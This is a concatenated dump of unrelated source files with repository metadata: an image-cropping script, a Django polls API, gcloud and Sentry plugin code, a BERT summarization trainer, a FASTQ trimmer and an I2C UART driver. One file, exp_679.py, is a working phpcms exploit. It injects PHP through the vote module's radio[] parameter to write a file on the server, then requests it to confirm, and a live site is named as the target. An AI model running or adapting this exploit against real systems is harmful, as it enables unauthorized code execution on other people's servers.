if((result[i][1]==result[j][0]) & (result[i][3]==result[j][2])):
result.append([result[i][0],result[j][1],result[i][2],result[j][3]])
result.remove(result[i])
result.remove(result[j-1])
do_sth=1
break
if(do_sth==1):
break
if(do_sth==0):
break
#print(result)
# for i in range(len(result)):
# print(tuple(result[i]))
# cv.rectangle(src_merged,tuple(result[i][0]),tuple(result[i][3]),(0,255,0),2)
# cv.imshow("rec",src_merged)
for i in range(len(result)):
new_img=src[int(result[i][0][1]):int(result[i][2][1]),int(result[i][0][0]):int(result[i][1][0])]
#cv.imshow("new%d"%(i),new_img)
path=input.split(".")
#mkdir("%s"%(path[0]))
#os.chdir("%s"%(path[0]))
filename="%snew%d.jpg"%(path[0],i)
print(filename)
cv.imwrite(filename,new_img)
os.chdir("image_example/1/")
print("out path:",os.getcwd())
files=os.listdir()
for file in files:
img_process(file)
cv.waitKey(0)
cv.destroyAllWindows()
|
[
"noreply@github.com"
] |
ruitengchang.noreply@github.com
|
405974db9681a1efc9bb65d55fa0ae64ee33d230
|
94470cf07f402b1c7824e92a852cd3203f94ac4a
|
/polls/apiviews.py
|
6f6ca88b9da4638cbf0f4888e4305f24fa9ffee5
|
[] |
no_license
|
jbeltranleon/pollsapi_django_rest
|
c509bf0b0c1e2db870ed8a4aaa1647bf74c5f8cd
|
0855820541064ffd77dbd1c6e77f695d4f18e517
|
refs/heads/master
| 2020-04-14T17:55:02.364183
| 2019-01-04T16:01:46
| 2019-01-04T16:01:46
| 163,999,126
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,203
|
py
|
from rest_framework import generics
from rest_framework.views import APIView
from rest_framework import status
from rest_framework.response import Response
from .models import Poll, Choice
from .serializers import PollSerializer, ChoiceSerializer,\
VoteSerializer
class PollList(generics.ListCreateAPIView):
queryset = Poll.objects.all()
serializer_class = PollSerializer
class PollDetail(generics.RetrieveDestroyAPIView):
queryset = Poll.objects.all()
serializer_class = PollSerializer
class ChoiceList(generics.ListCreateAPIView):
def get_queryset(self):
queryset = Choice.objects.filter(poll_id=self.kwargs["pk"])
return queryset
serializer_class = ChoiceSerializer
class CreateVote(APIView):
def post(self, request, pk, choice_pk):
voted_by = request.data.get("voted_by")
data = {'choice': choice_pk, 'poll': pk, 'voted_by': voted_by}
serializer = VoteSerializer(data=data)
if serializer.is_valid():
vote = serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
else:
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
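# Illustrative interaction with the CreateVote view above (the URL pattern shown
# is an assumption about how the view is wired in urls.py, not taken from this file):
# POST /polls/<pk>/choices/<choice_pk>/vote/ with {"voted_by": 7}
# -> 201 Created with the serialized vote, or 400 Bad Request with the errors.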
|
[
"jbeltranleon@gmail.com"
] |
jbeltranleon@gmail.com
|
4aff36fdb71b2bbc4fd29e2773506848f06a1fd6
|
8a7d5d67052892dd5d2a748282958f6244d963c6
|
/google-cloud-sdk/lib/surface/app/domain_mappings/delete.py
|
32842caf145b27ecec1a4e5410e7656b9643a037
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
KisleK/capstone
|
7d1d622bd5ca4cd355302778a02dc6d32ed00c88
|
fcef874f4fcef4b74ca016ca7bff92677673fded
|
refs/heads/master
| 2021-07-04T03:29:44.888340
| 2017-07-24T16:16:33
| 2017-07-24T16:16:33
| 93,699,673
| 0
| 2
| null | 2020-07-24T22:44:28
| 2017-06-08T02:34:17
|
Python
|
UTF-8
|
Python
| false
| false
| 1,812
|
py
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Surface for deleting an App Engine domain mapping."""
from googlecloudsdk.api_lib.app.api import appengine_domains_api_client as api_client
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.app import flags
from googlecloudsdk.core import log
from googlecloudsdk.core.console import console_io
class Delete(base.DeleteCommand):
"""Deletes a specified domain mapping."""
detailed_help = {
'DESCRIPTION':
'{description}',
'EXAMPLES':
"""\
To delete an App Engine domain mapping, run:
$ {command} '*.example.com'
""",
}
@staticmethod
def Args(parser):
flags.DOMAIN_FLAG.AddToParser(parser)
def Run(self, args):
console_io.PromptContinue(
prompt_string=('Deleting mapping [{0}]. This will stop your app from'
' serving from this domain.'.format(args.domain)),
cancel_on_no=True)
if self.ReleaseTrack() == base.ReleaseTrack.ALPHA:
client = api_client.AppengineDomainsApiAlphaClient.GetApiClient()
else:
client = api_client.AppengineDomainsApiClient.GetApiClient()
client.DeleteDomainMapping(args.domain)
log.DeletedResource(args.domain)
|
[
"kisle.kuhn1@gmail.com"
] |
kisle.kuhn1@gmail.com
|
e2e44ffd1b8897513aaba446dd704ac14b2c5945
|
35dbd536a17d7127a1dd1c70a2903ea0a94a84c2
|
/src/sentry_plugins/sessionstack/client.py
|
2c50f1bafe960bbe0331c77cff05e234168642de
|
[
"Apache-2.0",
"BUSL-1.1"
] |
permissive
|
nagyist/sentry
|
efb3ef642bd0431990ca08c8296217dabf86a3bf
|
d9dd4f382f96b5c4576b64cbf015db651556c18b
|
refs/heads/master
| 2023-09-04T02:55:37.223029
| 2023-01-09T15:09:44
| 2023-01-09T15:09:44
| 48,165,782
| 0
| 0
|
BSD-3-Clause
| 2022-12-16T19:13:54
| 2015-12-17T09:42:42
|
Python
|
UTF-8
|
Python
| false
| false
| 4,683
|
py
|
import requests
from sentry.http import safe_urlopen
from sentry.utils import json
from .utils import add_query_params, get_basic_auth, remove_trailing_slashes
ACCESS_TOKEN_NAME = "Sentry"
DEFAULT_SENTRY_SOURCE = "sentry"
API_URL = "https://api.sessionstack.com"
PLAYER_URL = "https://app.sessionstack.com/player"
WEBSITES_ENDPOINT = "/v1/websites/{}"
SESSION_ENDPOINT = "/v1/websites/{}/sessions/{}"
ACCESS_TOKENS_ENDPOINT = "/v1/websites/{}/sessions/{}/access_tokens"
SESSION_URL_PATH = "/#/sessions/"
MILLISECONDS_BEFORE_EVENT = 5000
class SessionStackClient:
def __init__(self, account_email, api_token, website_id, **kwargs):
self.website_id = website_id
api_url = kwargs.get("api_url") or API_URL
self.api_url = remove_trailing_slashes(api_url)
player_url = kwargs.get("player_url") or PLAYER_URL
self.player_url = remove_trailing_slashes(player_url)
self.request_headers = {
"Authorization": get_basic_auth(account_email, api_token),
"Content-Type": "application/json",
}
def validate_api_access(self):
website_endpoint = WEBSITES_ENDPOINT.format(self.website_id)
try:
response = self._make_request(website_endpoint, "GET")
except requests.exceptions.ConnectionError:
raise InvalidApiUrlError
if response.status_code == requests.codes.UNAUTHORIZED:
raise UnauthorizedError
elif response.status_code == requests.codes.BAD_REQUEST:
raise InvalidWebsiteIdError
elif response.status_code == requests.codes.NOT_FOUND:
raise InvalidApiUrlError
response.raise_for_status()
def get_session_url(self, session_id, event_timestamp):
player_url = self.player_url + SESSION_URL_PATH + session_id
query_params = {}
query_params["source"] = DEFAULT_SENTRY_SOURCE
access_token = self._get_access_token(session_id)
if access_token is not None:
query_params["access_token"] = access_token
if event_timestamp is not None:
start_timestamp = self._get_session_start_timestamp(session_id)
if start_timestamp is not None:
pause_at = event_timestamp - start_timestamp
play_from = pause_at - MILLISECONDS_BEFORE_EVENT
query_params["pause_at"] = pause_at
query_params["play_from"] = play_from
return add_query_params(player_url, query_params)
def _get_access_token(self, session_id):
access_token = self._create_access_token(session_id)
if not access_token:
access_token = self._get_existing_access_token(session_id)
return access_token
def _get_existing_access_token(self, session_id):
response = self._make_access_tokens_request(session_id, "GET")
if response.status_code != requests.codes.OK:
return None
access_tokens = json.loads(response.content).get("data")
for token in access_tokens:
token_name = token.get("name")
if token_name == ACCESS_TOKEN_NAME:
return token.get("access_token")
return None
def _create_access_token(self, session_id):
response = self._make_access_tokens_request(
session_id=session_id, method="POST", body={"name": ACCESS_TOKEN_NAME}
)
if response.status_code != requests.codes.OK:
return None
return json.loads(response.content).get("access_token")
def _make_access_tokens_request(self, session_id, method, **kwargs):
access_tokens_endpoint = self._get_access_tokens_endpoint(session_id)
return self._make_request(access_tokens_endpoint, method, **kwargs)
def _get_access_tokens_endpoint(self, session_id):
return ACCESS_TOKENS_ENDPOINT.format(self.website_id, session_id)
def _get_session_start_timestamp(self, session_id):
endpoint = SESSION_ENDPOINT.format(self.website_id, session_id)
response = self._make_request(endpoint, "GET")
if response.status_code == requests.codes.OK:
return json.loads(response.content).get("client_start")
def _make_request(self, endpoint, method, **kwargs):
url = self.api_url + endpoint
request_kwargs = {"method": method, "headers": self.request_headers}
body = kwargs.get("body")
if body:
request_kwargs["json"] = body
return safe_urlopen(url, **request_kwargs)
class UnauthorizedError(Exception):
pass
class InvalidWebsiteIdError(Exception):
pass
class InvalidApiUrlError(Exception):
pass
|
[
"noreply@github.com"
] |
nagyist.noreply@github.com
|
3a4928e43a8d2eb7a9e58b5e4c3c04eee176b3f5
|
0798277f2706998ab80442ac931579eb47f676e5
|
/bin/metric-markdown
|
ed615b4e0809a60c37d486fe5df8f258f20d47d9
|
[
"Apache-2.0"
] |
permissive
|
isabella232/pulse-api-cli
|
49ed38b0694ab289802f69ee6df4911cf3378e3f
|
b01ca65b442eed19faac309c9d62bbc3cb2c098f
|
refs/heads/master
| 2023-03-18T00:23:15.295727
| 2016-05-13T15:44:08
| 2016-05-13T15:44:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 817
|
#!/usr/bin/env python
#
# Copyright 2015 BMC Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from boundary import MetricMarkdown
"""
Reads the plugin.json manifest file looks up the definition and then outputs a markdown table
"""
if __name__ == "__main__":
c = MetricMarkdown()
c.execute()
|
[
"davidg@boundary.com"
] |
davidg@boundary.com
|
|
68ed6146980626889998a60eed343f5932d5d1a2
|
7e792f54abea89609fcc1317dbbc6b50012c56ec
|
/main.py
|
a360c9b3b6cb6ff0e81fd6148244159ed17ed374
|
[] |
no_license
|
sylvanusm/Bert-abstractive-summarisation
|
067ba2a53ae8a2d5e99f5024c77f29b52eadd39d
|
4e56bf0b2188b9684f4b1c2d59e60c5f6b8c090e
|
refs/heads/main
| 2023-06-07T17:19:47.812248
| 2021-06-26T10:28:52
| 2021-06-26T10:28:52
| 380,363,935
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,647
|
py
|
from model.transformer import Summarizer
from model.common_layer import evaluate
from utils import config
import torch
import wandb
import torch.nn as nn
import torch.nn.functional as F
from tqdm import tqdm
import os
import time
import numpy as np
from utils.data import get_dataloaders, InputExample, InputFeatures
def count_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad)
def train_draft():
train_dl, val_dl, test_dl, tokenizer = get_dataloaders(is_small=config.small)
if(config.test):
print("Test model",config.model)
model = Transformer(model_file_path=config.save_path,is_eval=True)
evaluate(model, test_dl, model_name=config.model, ty='test')
exit(0)
model = Summarizer(is_draft=True, toeknizer=tokenizer)
print("TRAINABLE PARAMETERS",count_parameters(model))
print("Use Cuda: ", config.USE_CUDA)
best_rouge = 0
cnt = 0
eval_iterval = 300
wandb.init(project=config.experiment, config={
"model_name": config.model_name,
"learning_rate": config.lr,
"batch_size": config.batch_size,
"hop": config.hop,
"heads": config.heads,
"epochs": config.epochs,
"beam_size": config.beam_size,
"emb_dim": config.emb_dim,
'cuda': config.USE_CUDA
})
conf = wandb.config
for e in range(config.epochs):
# model.train()
print("Epoch", e)
l = []
pbar = tqdm(enumerate(train_dl),total=len(train_dl))
for i, d in pbar:
loss = model.train_one_batch(d)
l.append(loss.item())
pbar.set_description("TRAIN loss:{:.4f}".format(np.mean(l)))
if i%eval_iterval==0:
# model.eval()
loss,r_avg, r1, r2, rl = evaluate(model,val_dl,model_name=config.model,ty="train")
wandb.log({"epoch": e,
"loss":loss,
"r_avg":r_avg,
"r1":r1,
"r2":r2,
"rl":rl})
# each epoch is long,so just do early stopping here.
if(r_avg > best_rouge):
best_rouge = r_avg
cnt = 0
model.save_model(loss,e,r_avg)
else:
cnt += 1
if(cnt > 20): break
# model.train()
# model.eval()
loss,r_avg, r1, r2, rl = evaluate(model,val_dl,model_name=config.model,ty="valid")
wandb.finish()
if __name__ == "__main__":
train_draft()
|
[
"sylvanusmahe@Sylvanuss-MacBook-Pro.local"
] |
sylvanusmahe@Sylvanuss-MacBook-Pro.local
|
63cf85af944332bdcc3cf505a3931ab50cb64c0f
|
600f361ac85c87dbc3a17cf3908dc0f4267a8c94
|
/quality-trim.py
|
2c2ac719751b4fb20d6f92a2f88d1c78ab76ac60
|
[] |
no_license
|
LeeBergstrand/Bioinformatics_scripts
|
801f00ea5d4346daf00f92d331f4a87737280ddd
|
0cfab04ecf43cf4f0aeba2d713532190cfc5eed1
|
refs/heads/master
| 2021-01-15T15:23:43.455647
| 2015-05-05T05:25:55
| 2015-05-05T05:25:55
| 19,826,979
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,170
|
py
|
#!/usr/bin/env python
import sys
import screed
import gzip
# python quality-trim.py <input fastq file> <output filtered fastq file>
# MINLENGTH is the minimum read length to keep. Reads that still contain 'N' base calls after the trailing 'N's are trimmed off are removed entirely.
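# Worked example of the trimming rule used below (assuming an Illumina-1.5-style
# quality string in which 'B' marks the start of the low-quality tail):
# accuracy = 'I' * 40 + 'B' * 10 -> accuracy.find('B') == 40 > MINLENGTH,
# so only the first 40 bases of the read are written out.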
MINLENGTH = 30
filein = sys.argv[1]
fileout = sys.argv[2]
fw = open(fileout, 'w')
count=0
for n, record in enumerate(screed.open(filein)):
name = record['name']
sequence = record['sequence']
accuracy = record['accuracy']
sequence = sequence.rstrip('N')
accuracy = accuracy[:len(sequence)]
if 'N' in sequence:
continue
else:
trim = accuracy.find('B')
if trim > MINLENGTH or (trim == -1 and len(sequence) > MINLENGTH):
if trim == -1:
fw.write('@%s\n%s\n+\n%s\n' % (name, sequence, accuracy))
else:
fw.write('@%s\n%s\n+\n%s\n' % (name, sequence[:trim], accuracy[:trim]))
count += 1
if n % 1000 == 0:
print 'scanning', n
print 'Original Number of Reads', n + 1
print 'Final Number of Reads', count
print 'Total Filtered', n + 1 - int(count)
|
[
"carden24@mail.ubc.ca"
] |
carden24@mail.ubc.ca
|
d31bf01470b66161944add4d5f0c467767484f48
|
1a7ac4eb338f53e96f92c84d560fd1707607bcc9
|
/ENV/bin/jupyter
|
3897bd35c4d09274ecf81879fcf8337d7d1c9519
|
[] |
no_license
|
kuwar/data-science-python-1
|
cf3d04dbcf3e57fe6976be7e2f3371ee0eb3304f
|
2738d00cb339c250fdeca30ad84d9be7ca87e570
|
refs/heads/master
| 2022-10-18T09:15:56.181434
| 2019-09-10T06:39:44
| 2019-09-10T06:39:44
| 207,480,173
| 0
| 1
| null | 2022-10-13T06:11:52
| 2019-09-10T06:20:01
|
Python
|
UTF-8
|
Python
| false
| false
| 265
|
#!/home/saurav/Documents/GitHub/Python/second/ENV/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from jupyter_core.command import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"skuwar@olivemedia.co"
] |
skuwar@olivemedia.co
|
|
95d38eb622dd57ea6cf2bba55e5202edeb6e0e3b
|
43ff15a7989576712d0e51f0ed32e3a4510273c0
|
/tools/pocs/bugscan/exp_679.py
|
798104fb95f83ba1ff04752dfd711df064cc3623
|
[] |
no_license
|
v1cker/kekescan
|
f2b51d91a9d6496e2cdc767eb6a600171f513449
|
3daa1775648439ba9e0003a376f90b601820290e
|
refs/heads/master
| 2020-09-19T16:26:56.522453
| 2017-06-15T02:55:24
| 2017-06-15T02:55:24
| 94,495,007
| 6
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,954
|
py
|
# -*- coding: utf-8 -*-
from dummy import *
from miniCurl import Curl
curl = Curl()
# !/usr/bin/dev python
# -*- coding:utf-8 -*-
"""
reference:
http://www.wooyun.org/bugs/wooyun-2015-0104157
http://www.beebeeto.com/pdb/poc-2015-0086/
"""
import re
import urllib
import urllib2
import base64
import random
def get_vote_links(args):
vul_url = args
vote_url = '%sindex.php?m=vote' % vul_url
code, head, res, _, _ = curl.curl(vote_url)
ids = []
for miter in re.finditer(r'<a href=.*?subjectid=(?P<id>\d+)', res, re.DOTALL):
ids.append(miter.group('id'))
if len(ids) == 0:
return None
return list(set(ids))
def assign(service, args):
if service == 'phpcms':
return True, args
pass
def audit(args):
vul_url = args
ids = get_vote_links(args)
file_name = 'w2x5Tt_%s.php' % random.randint(1,3000)
base64_name = base64.b64encode(file_name)
if ids:
for i in ids:
exploit_url = '%sindex.php?m=vote&c=index&a=post&subjectid=%s&siteid=1' % (vul_url, i)
payload = {'subjectid': 1,
'radio[]': ');fputs(fopen(base64_decode(%s),w),"vulnerable test");' % base64_name}
post_data = urllib.urlencode(payload)
code,head,body,_,_=curl.curl('-d "%s" %s' % (post_data, exploit_url))
if code==200:
verify_url = '%sindex.php?m=vote&c=index&a=result&subjectid=%s&siteid=1' % (vul_url, i)
code,head,body,_,_=curl.curl(verify_url)
if code==200:
shell_url = '%s%s' % (vul_url, file_name)
code, head, res, _, _ = curl.curl(shell_url)
if code == 200 and 'vulnerable test' in res:
security_hole(vul_url)
if __name__ == "__main__":
from dummy import *
audit(assign('phpcms', 'http://www.jkb.com.cn/')[1])
|
[
"liyueke@huobi.com"
] |
liyueke@huobi.com
|
9907349705be2a4fdbc48e95c52054b00ad85246
|
4efcfcaec6cc956d15a1ae966905911809c4de18
|
/Supervised Deep Learning/Artificial Neural Networks (ANN)/artificial_neural_network.py
|
72ded64f7630ebf2867544dae348d8c8a1fe4aa0
|
[
"BSD-3-Clause"
] |
permissive
|
Nikhil-Xavier-DS/Deep-Learning-Algorithms-KERAS
|
9aa54eebaf688d83efa13767dd0e378339774e9c
|
7bbda3b1495d2e377abef2938c193afd34d95038
|
refs/heads/master
| 2020-03-28T09:00:22.535353
| 2018-09-09T08:30:32
| 2018-09-09T08:30:32
| 148,006,476
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,994
|
py
|
# Artificial Neural Network
# Import libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Import Dataset
dataset = pd.read_csv('Churn_Modelling.csv')
X = dataset.iloc[:,3: 13].values
y = dataset.iloc[:,13].values
# Encoding categorical data
from sklearn.preprocessing import LabelEncoder, OneHotEncoder
labelencoder_X_1 = LabelEncoder()
X[:, 1] = labelencoder_X_1.fit_transform(X[:, 1])
labelencoder_X_2 = LabelEncoder()
X[:, 2] = labelencoder_X_2.fit_transform(X[:, 2])
onehotencoder = OneHotEncoder(categorical_features = [1])
X = onehotencoder.fit_transform(X).toarray()
X = X[:, 1:]
# Splitting into training set & test set
from sklearn.cross_validation import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)
# Feature scaling
from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
X_train = sc_X.fit_transform(X_train)
X_test = sc_X.transform(X_test)
# Let us make ANN
# Import Keras library
import keras
from keras.models import Sequential
from keras.layers import Dense
# Initializing ANN
classifier = Sequential()
# Adding Input layer and First hidden layer
classifier.add(Dense(output_dim = 6, init = 'uniform', activation = 'relu', input_dim = 11))
# Adding Second hidden layer
classifier.add(Dense(output_dim = 6, init = 'uniform', activation = 'relu'))
# Adding Output layer
classifier.add(Dense(output_dim = 1, init = 'uniform', activation = 'sigmoid'))
# Compiling ANN
classifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy'])
# Fit ANN to training set
classifier.fit(X_train, y_train, batch_size = 10, epochs = 100)
# Predict and evaluate model
y_pred = classifier.predict(X_test)
for i in range(0, len(y_pred)):
if(y_pred[i] >= 0.5):
y_pred[i] = True
else:
y_pred[i] = False
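# Equivalent vectorized thresholding (a sketch using the same 0.5 cut-off as the
# loop above, shown as a comment so the original behaviour is unchanged):
# y_pred = (classifier.predict(X_test) >= 0.5)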
# Confusion Matrix
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
cm
|
[
"nikhilxavier@yahoo.com"
] |
nikhilxavier@yahoo.com
|
f898a507fb5c8d1476d837dc594f7b5fa3b68cd6
|
b80b3b82bb1f4c4019e56bf6eed859d9e1ec024b
|
/python/tolower.py
|
4b443cc2001eef828e7353d23079405cbb61b962
|
[] |
no_license
|
NotaCSstudent/leetcode
|
be484537f20302557411ed0a2d653703b4c86abe
|
13c3fc89e492209f70fcb8e7756c8553f5736a1e
|
refs/heads/main
| 2023-06-08T22:59:41.680890
| 2021-06-20T13:37:46
| 2021-06-20T13:37:46
| 372,983,624
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 106
|
py
|
class Solution:
def toLowerCase(self, s: str) -> str:
s = s.lower()
return s
|
[
"noreply@github.com"
] |
NotaCSstudent.noreply@github.com
|
31508bdac6628284abbbd3294418d6af5c325c67
|
b8d5270f2af049e795d02887fbe322054b82f600
|
/SC16IS750.py
|
28bdf44a54e2501340f0142873eca248d24d6733
|
[] |
no_license
|
Harri-Renney/SC16IS750
|
1d73c42aa7fbec05413d7c2e7ea4fca2477e799c
|
8da36a31ca930ea88af2e73cce6ea163bda3ba25
|
refs/heads/master
| 2021-08-18T05:26:22.753747
| 2020-03-26T20:58:12
| 2020-03-26T20:58:12
| 141,274,557
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,484
|
py
|
import smbus
from enum import IntEnum
class SC16IS750:
DEVICE_ADDRESS = 0x9A  # default I2C address; 'self' is not available at class scope
CrystalFrequency = 0
class registers(IntEnum):
RHR= 0x00 # Receive Holding Register (R)
THR= 0x00 # Transmit Holding Register (W)
IER= 0x01 # Interrupt Enable Register (R/W)
FCR= 0x02 # FIFO Control Register (W)
IIR= 0x02 # Interrupt Identification Register (R)
LCR= 0x03 # Line Control Register (R/W)
MCR= 0x04 # Modem Control Register (R/W)
LSR= 0x05 # Line Status Register (R)
MSR= 0x06 # Modem Status Register (R)
SPR= 0x07 # Scratchpad Register (R/W)
TCR= 0x06 # Transmission Control Register (R/W)
TLR= 0x07 # Trigger Level Register (R/W)
TXLVL = 0x08 # Transmit FIFO Level Register (R)
RXLVL = 0x09 # Receive FIFO Level Register (R)
IODIR= 0x0A # I/O pin Direction Register (R/W)
IOSTATE= 0x0B # I/O pin States Register (R)
IOINTENA= 0x0C # I/O Interrupt Enable Register (R/W)
IOCONTROL= 0x0E # I/O pins Control Register (R/W)
EFCR= 0x0F # Extra Features Register (R/W)
# -- Special Register Set (Requires LCR[7] = 1 & LCR != 0xBF to use)
DLL= 0x00 # Divisor Latch LSB (R/W)
DLH= 0x01 # Divisor Latch MSB (R/W)
# -- Enhanced Register Set (Requires LCR = 0xBF to use)
EFR= 0x02 # Enhanced Feature Register (R/W)
XON1= 0x04 # XOn1 (R/W)
XON2= 0x05 # XOn2 (R/W)
XOFF1= 0x06 # XOff1 (R/W)
XOFF2= 0x07 # XOff2 (R/W)
def init(self, crystalFrequency, deviceaddress=0x9A):
print("Initalising SC16IS750.")
self.DEVICE_ADDRESS = deviceaddress
self.bus = smbus.SMBus(1)
self.crystalFrequency = crystalFrequency
# def __init__():
def readRegister(self, registerAddress):
shiftedDeviceAddress = self.DEVICE_ADDRESS >> 1
shiftedRegisterAddress = registerAddress << 3
registerReadValue = self.bus.read_byte_data(shiftedDeviceAddress, shiftedRegisterAddress)
return registerReadValue
def writeRegister(self, registerAddress, data):
shiftedDeviceAddress = self.DEVICE_ADDRESS >> 1
shiftedRegisterAddress = registerAddress << 3
self.bus.write_byte_data(shiftedDeviceAddress, shiftedRegisterAddress, data)
##Set the desired baudrate of chips UART##
def setBaudrate(self, baudrate):
clockDivisor = (self.readRegister(self.registers.MCR) & 0b10000000) >> 7
if(clockDivisor == 0):
prescaler = 1
elif(clockDivisor == 1):
prescaler = 4
divisor = int((self.crystalFrequency / prescaler) / (baudrate * 16))
lowerDivisor = (divisor & 0xFF)
higherDivisor = (divisor & 0xFF00) >> 8
self.setRegisterBit(self.registers.LCR, 7)
self.writeRegister(self.registers.DLL, lowerDivisor)
self.writeRegister(self.registers.DLH, higherDivisor)
self.unsetRegisterBit(self.registers.LCR, 7)
##Set the desired UART attributes##
def setUARTAttributes(self, dataBits, parityType, stopBits):
#Calculate bits for LCR register#
print("Setting UART attributes.")
##Set the bit in position passed##
def setRegisterBit(self, registerAddress, registerBit):
current = self.readRegister(registerAddress)
updated = current | (1 << registerBit)
self.writeRegister(registerAddress, updated)
##Unset the bit in position passed##
def unsetRegisterBit(self, registerAddress, registerBit):
current = self.readRegister(registerAddress)
updated = current & ~(1 << registerBit)
self.writeRegister(registerAddress, updated)
##Checks if any data in FIFO buffer##
def isDataWaiting(self):
register = self.readRegister(self.registers.LSR)
isWaiting = register & 0b1
if(isWaiting):
return True
return False
##Checks number of bytes waiting in FIFO buffer##
def dataWaiting(self):
return self.readRegister(self.registers.RXLVL)
##Writes to Scratch register and checks successful##
def testChip(self):
self.writeRegister(self.registers.SPR, 0xFF)
if(self.readRegister(self.registers.SPR) != 0xFF):
return False
return True
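# Minimal usage sketch (comments only: it assumes an SC16IS750 wired to I2C bus 1,
# as opened in init(); the 14.7456 MHz crystal and 9600 baud values are illustrative,
# not taken from this file):
# uart = SC16IS750()
# uart.init(crystalFrequency=14745600)  # note: init(), not __init__, in this driver
# uart.setBaudrate(9600)
# if uart.testChip():
#     print("scratch register read back OK")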
|
[
"harri.renney@blino.co.uk"
] |
harri.renney@blino.co.uk
|
7f7bc5dacb84f4e18c258d76fd91a9bb8cc3af3b
|
54f352a242a8ad6ff5516703e91da61e08d9a9e6
|
/Source Codes/CodeJamData/12/23/12.py
|
da0396d4cf15e8267cd6d9041247bc41bc9c3b63
|
[] |
no_license
|
Kawser-nerd/CLCDSA
|
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
|
aee32551795763b54acb26856ab239370cac4e75
|
refs/heads/master
| 2022-02-09T11:08:56.588303
| 2022-01-26T18:53:40
| 2022-01-26T18:53:40
| 211,783,197
| 23
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,511
|
py
|
# -*- coding:utf-8 -*-
import os, itertools
curr_dir = os.path.dirname(os.path.abspath(__file__))
srcfilename = os.path.join(curr_dir, 'C-large.in')
dstfilename = os.path.join(curr_dir, 'output.txt')
def solve(numbers_):
numbers = sorted(numbers_)
memory = dict((k, [k]) for k in numbers)
for r in xrange(2, len(numbers)):
combinations = itertools.combinations(numbers, r)
for combination in combinations:
s = sum(combination)
if s in memory:
r1 = memory[s]
r2 = combination
return r1, r2
memory[s] = combination
return 'Impossible'
if __name__ == '__main__':
with open(srcfilename, 'rb') as inp:
with open(dstfilename, 'wb') as outp:
lines = inp.readlines()
count = int(lines.pop(0))
outlines = []
for i in xrange(count):
line = lines[i]
numbers = [int(number) for number in line.split(' ')]
numbers.pop(0)
result = solve(numbers)
if result == 'Impossible':
outlines.append('Case #%d: Impossible\n' % (i+1,))
else:
r1, r2 = result
outlines.append('Case #%d:\n' % (i+1,))
outlines.append('%s\n' % ' '.join(['%d' % r1i for r1i in r1]))
outlines.append('%s\n' % ' '.join(['%d' % r2i for r2i in r2]))
outp.writelines(outlines)
|
[
"kwnafi@yahoo.com"
] |
kwnafi@yahoo.com
|
db3d9f7ffa0daf93dc6ef9d1b818888be5ac8e5d
|
93afa6da4a41e6346079cf437aa11fe27ae84d93
|
/venv/bin/easy_install
|
c86211b025ea693cb90960dd17d613e34059f37e
|
[] |
no_license
|
alexbatashev/rungekutta
|
20695e3d0706b7cfde2f7b4c0150e74122b4a6d5
|
7c71228b6bbbeebe0771b45e4d85c342f2d2fdd7
|
refs/heads/master
| 2020-05-05T06:56:03.982750
| 2019-04-07T08:29:28
| 2019-04-07T08:29:28
| 179,806,651
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 454
|
#!/Users/aleksandrbatasev/PycharmProjects/rungekutta/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install')()
)
|
[
"alexbatashev@outlook.com"
] |
alexbatashev@outlook.com
|
|
04aaeca81365d84683d423d2113d3dca18c1ddb6
|
6451afeb63ae2be4974cab898e1f72d3d5633d72
|
/gmailsync/utils.py
|
fc8018f7c83296daadc1a88c73cf96d850af8835
|
[
"Apache-2.0"
] |
permissive
|
albertoalcolea/gmailsync
|
f8fb8bd6bee3911482b6ef64f99d714682405938
|
cf2c1f074c24234284e1cfc2949341df1a9899ba
|
refs/heads/master
| 2022-05-02T22:40:46.881024
| 2022-04-14T17:08:28
| 2022-04-14T17:08:28
| 217,107,647
| 4
| 3
| null | null | null | null |
